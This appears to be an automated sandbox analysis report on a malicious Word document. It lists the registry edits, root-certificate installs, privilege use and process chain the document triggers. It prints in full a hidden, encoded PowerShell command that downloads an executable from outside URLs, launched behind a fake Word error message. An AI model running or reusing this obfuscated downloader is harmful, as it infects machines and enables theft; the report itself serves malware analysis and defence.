Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect"	WINWORD.EXE

Modifies system certificate store 2 TTPs 7 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

csrss.exemesager43.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	csrss.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	mesager43.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	mesager43.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	mesager43.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	csrss.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	csrss.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	csrss.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

1808 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

700 powershell.exe
700 powershell.exe

pid	process
1808	WINWORD.EXE

pid	process
700	powershell.exe
700	powershell.exe

Suspicious use of AdjustPrivilegeToken 90 IoCs

Processes:

powershell.exemesager43.exetaskkill.exetaskkill.exeWMIC.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	700	powershell.exe
Token: SeDebugPrivilege	1980	mesager43.exe
Token: SeDebugPrivilege	1980	mesager43.exe
Token: SeDebugPrivilege	2076	taskkill.exe
Token: SeDebugPrivilege	2120	taskkill.exe
Token: SeIncreaseQuotaPrivilege	2360	WMIC.exe
Token: SeSecurityPrivilege	2360	WMIC.exe
Token: SeTakeOwnershipPrivilege	2360	WMIC.exe
Token: SeLoadDriverPrivilege	2360	WMIC.exe
Token: SeSystemProfilePrivilege	2360	WMIC.exe
Token: SeSystemtimePrivilege	2360	WMIC.exe
Token: SeProfSingleProcessPrivilege	2360	WMIC.exe
Token: SeIncBasePriorityPrivilege	2360	WMIC.exe
Token: SeCreatePagefilePrivilege	2360	WMIC.exe
Token: SeBackupPrivilege	2360	WMIC.exe
Token: SeRestorePrivilege	2360	WMIC.exe
Token: SeShutdownPrivilege	2360	WMIC.exe
Token: SeDebugPrivilege	2360	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2360	WMIC.exe
Token: SeRemoteShutdownPrivilege	2360	WMIC.exe
Token: SeUndockPrivilege	2360	WMIC.exe
Token: SeManageVolumePrivilege	2360	WMIC.exe
Token: 33	2360	WMIC.exe
Token: 34	2360	WMIC.exe
Token: 35	2360	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2500	WMIC.exe
Token: SeSecurityPrivilege	2500	WMIC.exe
Token: SeTakeOwnershipPrivilege	2500	WMIC.exe
Token: SeLoadDriverPrivilege	2500	WMIC.exe
Token: SeSystemProfilePrivilege	2500	WMIC.exe
Token: SeSystemtimePrivilege	2500	WMIC.exe
Token: SeProfSingleProcessPrivilege	2500	WMIC.exe
Token: SeIncBasePriorityPrivilege	2500	WMIC.exe
Token: SeCreatePagefilePrivilege	2500	WMIC.exe
Token: SeBackupPrivilege	2500	WMIC.exe
Token: SeRestorePrivilege	2500	WMIC.exe
Token: SeShutdownPrivilege	2500	WMIC.exe
Token: SeDebugPrivilege	2500	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2500	WMIC.exe
Token: SeRemoteShutdownPrivilege	2500	WMIC.exe
Token: SeUndockPrivilege	2500	WMIC.exe
Token: SeManageVolumePrivilege	2500	WMIC.exe
Token: 33	2500	WMIC.exe
Token: 34	2500	WMIC.exe
Token: 35	2500	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2360	WMIC.exe
Token: SeSecurityPrivilege	2360	WMIC.exe
Token: SeTakeOwnershipPrivilege	2360	WMIC.exe
Token: SeLoadDriverPrivilege	2360	WMIC.exe
Token: SeSystemProfilePrivilege	2360	WMIC.exe
Token: SeSystemtimePrivilege	2360	WMIC.exe
Token: SeProfSingleProcessPrivilege	2360	WMIC.exe
Token: SeIncBasePriorityPrivilege	2360	WMIC.exe
Token: SeCreatePagefilePrivilege	2360	WMIC.exe
Token: SeBackupPrivilege	2360	WMIC.exe
Token: SeRestorePrivilege	2360	WMIC.exe
Token: SeShutdownPrivilege	2360	WMIC.exe
Token: SeDebugPrivilege	2360	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2360	WMIC.exe
Token: SeRemoteShutdownPrivilege	2360	WMIC.exe
Token: SeUndockPrivilege	2360	WMIC.exe
Token: SeManageVolumePrivilege	2360	WMIC.exe
Token: 33	2360	WMIC.exe
Token: 34	2360	WMIC.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

WINWORD.EXE

pid process

1808 WINWORD.EXE
1808 WINWORD.EXE

pid	process
1808	WINWORD.EXE
1808	WINWORD.EXE

Suspicious use of WriteProcessMemory 128 IoCs

Processes:

cmd.exeWINWORD.EXEBw99ofg.exeWScript.execmd.exeWScript.execmd.exemesager43.exe

description	pid	process	target process
PID 308 wrote to memory of 1060	308	cmd.exe	msg.exe
PID 308 wrote to memory of 1060	308	cmd.exe	msg.exe
PID 308 wrote to memory of 1060	308	cmd.exe	msg.exe
PID 308 wrote to memory of 700	308	cmd.exe	powershell.exe
PID 308 wrote to memory of 700	308	cmd.exe	powershell.exe
PID 308 wrote to memory of 700	308	cmd.exe	powershell.exe
PID 1808 wrote to memory of 1484	1808	WINWORD.EXE	splwow64.exe
PID 1808 wrote to memory of 1484	1808	WINWORD.EXE	splwow64.exe
PID 1808 wrote to memory of 1484	1808	WINWORD.EXE	splwow64.exe
PID 1808 wrote to memory of 1484	1808	WINWORD.EXE	splwow64.exe
PID 1300 wrote to memory of 1668	1300	Bw99ofg.exe	WScript.exe
PID 1300 wrote to memory of 1668	1300	Bw99ofg.exe	WScript.exe
PID 1300 wrote to memory of 1668	1300	Bw99ofg.exe	WScript.exe
PID 1300 wrote to memory of 1668	1300	Bw99ofg.exe	WScript.exe
PID 1668 wrote to memory of 748	1668	WScript.exe	cmd.exe
PID 1668 wrote to memory of 748	1668	WScript.exe	cmd.exe
PID 1668 wrote to memory of 748	1668	WScript.exe	cmd.exe
PID 1668 wrote to memory of 748	1668	WScript.exe	cmd.exe
PID 748 wrote to memory of 1896	748	cmd.exe	15sp.exe
PID 748 wrote to memory of 1896	748	cmd.exe	15sp.exe
PID 748 wrote to memory of 1896	748	cmd.exe	15sp.exe
PID 748 wrote to memory of 1896	748	cmd.exe	15sp.exe
PID 748 wrote to memory of 1592	748	cmd.exe	timeout.exe
PID 748 wrote to memory of 1592	748	cmd.exe	timeout.exe
PID 748 wrote to memory of 1592	748	cmd.exe	timeout.exe
PID 748 wrote to memory of 1592	748	cmd.exe	timeout.exe
PID 748 wrote to memory of 916	748	cmd.exe	WScript.exe
PID 748 wrote to memory of 916	748	cmd.exe	WScript.exe
PID 748 wrote to memory of 916	748	cmd.exe	WScript.exe
PID 748 wrote to memory of 916	748	cmd.exe	WScript.exe
PID 748 wrote to memory of 1776	748	cmd.exe	timeout.exe
PID 748 wrote to memory of 1776	748	cmd.exe	timeout.exe
PID 748 wrote to memory of 1776	748	cmd.exe	timeout.exe
PID 748 wrote to memory of 1776	748	cmd.exe	timeout.exe
PID 916 wrote to memory of 1472	916	WScript.exe	cmd.exe
PID 916 wrote to memory of 1472	916	WScript.exe	cmd.exe
PID 916 wrote to memory of 1472	916	WScript.exe	cmd.exe
PID 916 wrote to memory of 1472	916	WScript.exe	cmd.exe
PID 1472 wrote to memory of 1348	1472	cmd.exe	attrib.exe
PID 1472 wrote to memory of 1348	1472	cmd.exe	attrib.exe
PID 1472 wrote to memory of 1348	1472	cmd.exe	attrib.exe
PID 1472 wrote to memory of 1348	1472	cmd.exe	attrib.exe
PID 1472 wrote to memory of 396	1472	cmd.exe	timeout.exe
PID 1472 wrote to memory of 396	1472	cmd.exe	timeout.exe
PID 1472 wrote to memory of 396	1472	cmd.exe	timeout.exe
PID 1472 wrote to memory of 396	1472	cmd.exe	timeout.exe
PID 1472 wrote to memory of 1980	1472	cmd.exe	mesager43.exe
PID 1472 wrote to memory of 1980	1472	cmd.exe	mesager43.exe
PID 1472 wrote to memory of 1980	1472	cmd.exe	mesager43.exe
PID 1472 wrote to memory of 1980	1472	cmd.exe	mesager43.exe
PID 1980 wrote to memory of 1992	1980	mesager43.exe	csrss.exe
PID 1980 wrote to memory of 1992	1980	mesager43.exe	csrss.exe
PID 1980 wrote to memory of 1992	1980	mesager43.exe	csrss.exe
PID 1980 wrote to memory of 1992	1980	mesager43.exe	csrss.exe
PID 1980 wrote to memory of 668	1980	mesager43.exe	notepad.exe
PID 1980 wrote to memory of 668	1980	mesager43.exe	notepad.exe
PID 1980 wrote to memory of 668	1980	mesager43.exe	notepad.exe
PID 1980 wrote to memory of 668	1980	mesager43.exe	notepad.exe
PID 1980 wrote to memory of 668	1980	mesager43.exe	notepad.exe
PID 1980 wrote to memory of 668	1980	mesager43.exe	notepad.exe
PID 1980 wrote to memory of 668	1980	mesager43.exe	notepad.exe
PID 1472 wrote to memory of 2076	1472	cmd.exe	taskkill.exe
PID 1472 wrote to memory of 2076	1472	cmd.exe	taskkill.exe
PID 1472 wrote to memory of 2076	1472	cmd.exe	taskkill.exe

Views/modifies file attributes 1 TTPs 2 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exe

pid process

1348 attrib.exe
2152 attrib.exe

pid	process
1348	attrib.exe
2152	attrib.exe

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Delivery-77426522.doc"
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1808

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:1484

C:\Windows\system32\cmd.exe
cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkADQANwB6AHUAMwAgACAAPQAgACAAWwB0AHkAUABFAF0AKAAiAHsAMgB9AHsAMQB9AHsAMwB9AHsAMAB9ACIAIAAtAGYAIAAnAHQATwBSAHkAJwAsACcAZQBtAC4AaQBPAC4ARAAnACwAJwBzAHkAUwBUACcALAAnAGkAUgBFAEMAJwApACAAIAA7ACAAIAAgAHMARQB0ACAAIABOAGgAdABNACAAIAAoAFsAdABZAHAARQBdACgAIgB7ADQAfQB7ADIAfQB7ADUAfQB7ADkAfQB7ADcAfQB7ADEAfQB7ADAAfQB7ADYAfQB7ADgAfQB7ADMAfQAiACAALQBGACAAJwBlACcALAAnAHMAJwAsACcAZQAnACwAJwBOAEEAZwBlAFIAJwAsACcAcwBZAFMAdAAnACwAJwBtAC4AbgAnACwAJwBSAHYASQBDAEUAUABPAEkATgAnACwAJwBUAC4AJwAsACcAdABNAEEAJwAsACcARQAnACkAIAApACAAIAA7ACQAQgBmAG8AeABnAGEAMAA9ACgAJwBRACcAKwAoACcAdwBuAHkAOAAnACsAJwA4ADQAJwApACkAOwAkAFcAdwBwAHAANQA0AHgAPQAkAEIAYQAyAHIAZAA5ADgAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEIAMQBoAGsAdgAyAG0AOwAkAFEAdABuAHkAbwBfAHcAPQAoACcATABpACcAKwAoACcAYwA4AHkAJwArACcAMQAnACkAKwAnAHkAJwApADsAIAAgACQANAA3AHoAVQAzADoAOgAiAGMAYABSAEUAQQBUAGAAZQBgAEQAaQByAGAARQBDAFQATwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAHIAaQBHAFcAbwBpACcAKwAnADEAJwArACcAcwAnACsAJwBhACcAKQArACgAJwBvAHIAJwArACcAaQAnACkAKwAoACcARwAnACsAJwBNAGYAJwApACsAJwAzAG8AJwArACcAZwBoACcAKwAoACcAXwAnACsAJwByAGkARwAnACkAKQAuACIAUgBFAGAAUABsAEEAQwBFACIAKAAoAFsAQwBoAEEAUgBdADEAMQA0ACsAWwBDAGgAQQBSAF0AMQAwADUAKwBbAEMAaABBAFIAXQA3ADEAKQAsACcAXAAnACkAKQApADsAJABKAHkAbQBnAHIAcwA0AD0AKAAoACcARwAnACsAJwBrAHYAJwApACsAJwByADUAJwArACcAeQBwACcAKQA7ACAAKAAgAGcASQAgACAAVgBBAFIAaQBhAGIAbABlADoAbgBIAHQATQAgACkALgBWAEEATAB1AGUAOgA6ACIAcwBlAEMAVQBgAFIAaQBUAGAAeQBwAFIAYABPAFQAYABvAEMATwBsACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABIADEAYgBvAHUAZQAxAD0AKAAoACcASwAnACsAJwA3AGIANgAnACkAKwAoACcANgBfACcAKwAnAHIAJwApACkAOwAkAFgAegA0AHgANgBsAHgAIAA9ACAAKAAoACcAQgAnACsAJwB3ADkAJwApACsAKAAnADkAbwAnACsAJwBmACcAKQArACcAZwAnACkAOwAkAFQAaQBwAGUAbwBmAGIAPQAoACgAJwBVAGYAJwArACcAeAA5ACcAKQArACcAegAnACsAJwBrAGIAJwApADsAJABZAGoAMwB2AHEAOQBrAD0AKAAnAFYAJwArACgAJwBpAHAAaAAnACsAJwAxAHMAJwArACcAcwAnACkAKQA7ACQASgAzAGUAaABrAG0AbQA9ACQASABPAE0ARQArACgAKAAnAHsAMAB9AFcAbwBpACcAKwAnADEAcwBhAG8AewAwACcAKwAnAH0ATQBmADMAbwBnACcAKwAnAGgAXwAnACsAJwB7ADAAfQAnACkAIAAgAC0AZgAgACAAWwBjAGgAYQByAF0AOQAyACkAKwAkAFgAegA0AHgANgBsAHgAKwAoACcALgAnACsAKAAnAGUAJwArACcAeABlACcAKQApADsAJABPADgAeABsADEAdwB6AD0AKAAnAFYAJwArACgAJwBqACcAKwAnAGMAMQBtACcAKwAnAHQAeQAnACkAKQA7ACQARwB1ADMAdwByAHgAaQA9AG4ARQB3AC0ATwBCAGAAagBgAGUAQwBUACAATgBlAFQALgB3AGUAQgBjAEwASQBlAG4AVAA7ACQAWAA1ADMAeQBjAF8ANgA9ACgAKAAoACcAaAB0ACcAKwAnAHQAcAAnACkAKwAnADoAJwArACgAKAAnACkAKAAnACkAKQArACgAKAAnACkAVwAnACkAKQArACgAKAAnAE4AKQAnACsAJwAoACkAKAAnACkAKQArACcAKQAnACsAKAAoACcAVwAnACsAJwBOACkAJwApACkAKwAoACgAJwAoAHYAJwApACkAKwAoACcAaQBkACcAKwAnAHIAaQBvAGkAbgAnACkAKwAnAGQAJwArACcAdQAnACsAJwBzAHQAJwArACgAJwByACcAKwAnAGkAYQBsAC4AJwApACsAJwBjACcAKwAoACgAJwBvAG0AKQAnACsAJwAoACkAJwApACkAKwAoACgAJwBXACcAKwAnAE4AKQAnACkAKQArACcAKAAnACsAKAAnAGgANgBtAGsAZwAnACsAJwByAC4AJwApACsAKAAnAHIAJwArACcAYQByAEAAJwApACsAJwBoAHQAJwArACcAdAAnACsAKAAoACcAcAA6ACcAKwAnACkAKAApACcAKwAnAFcATgApACgAKQAoACcAKQApACsAKAAoACcAKQAnACsAJwBXAE4AKQAnACkAKQArACgAKAAnACgAZgAnACkAKQArACgAJwBvAHIAYwBlACcAKwAnAGMAJwArACcAYQAnACkAKwAoACcAcgAnACsAJwBlAGUAJwApACsAJwByAC4AJwArACcAYwBvACcAKwAnAG0AJwArACcAKQAnACsAKAAoACcAKAApAFcAJwArACcATgApACcAKQApACsAJwAoACcAKwAoACcAZQAnACsAJwBmAGYAJwApACsAKAAnAG8AOAAnACsAJwB5ACcAKQArACcAdQAnACsAKAAnAC4AcgAnACsAJwBhAHIAJwApACsAKAAnAEAAJwArACcAaAB0AHQAJwApACsAJwBwADoAJwArACgAKAAnACkAKAApAFcATgAnACsAJwApACcAKQApACsAKAAoACcAKAAnACsAJwApACgAKQBXAE4AJwArACcAKQAoAG8AJwArACcAbgAnACkAKQArACcAdwAuACcAKwAnAGsAJwArACcAeAAxACcAKwAnAC4AaQAnACsAKAAoACcAbgApACcAKQApACsAKAAoACcAKAApAFcAJwArACcATgApACcAKQApACsAKAAoACcAKABkAGEAJwArACcAdgA0ADMAYQA1ACcAKwAnAGsAcQAnACkAKQArACgAJwAuACcAKwAnAHIAYQByACcAKQArACcAQABoACcAKwAnAHQAJwArACcAdAAnACsAKAAoACcAcA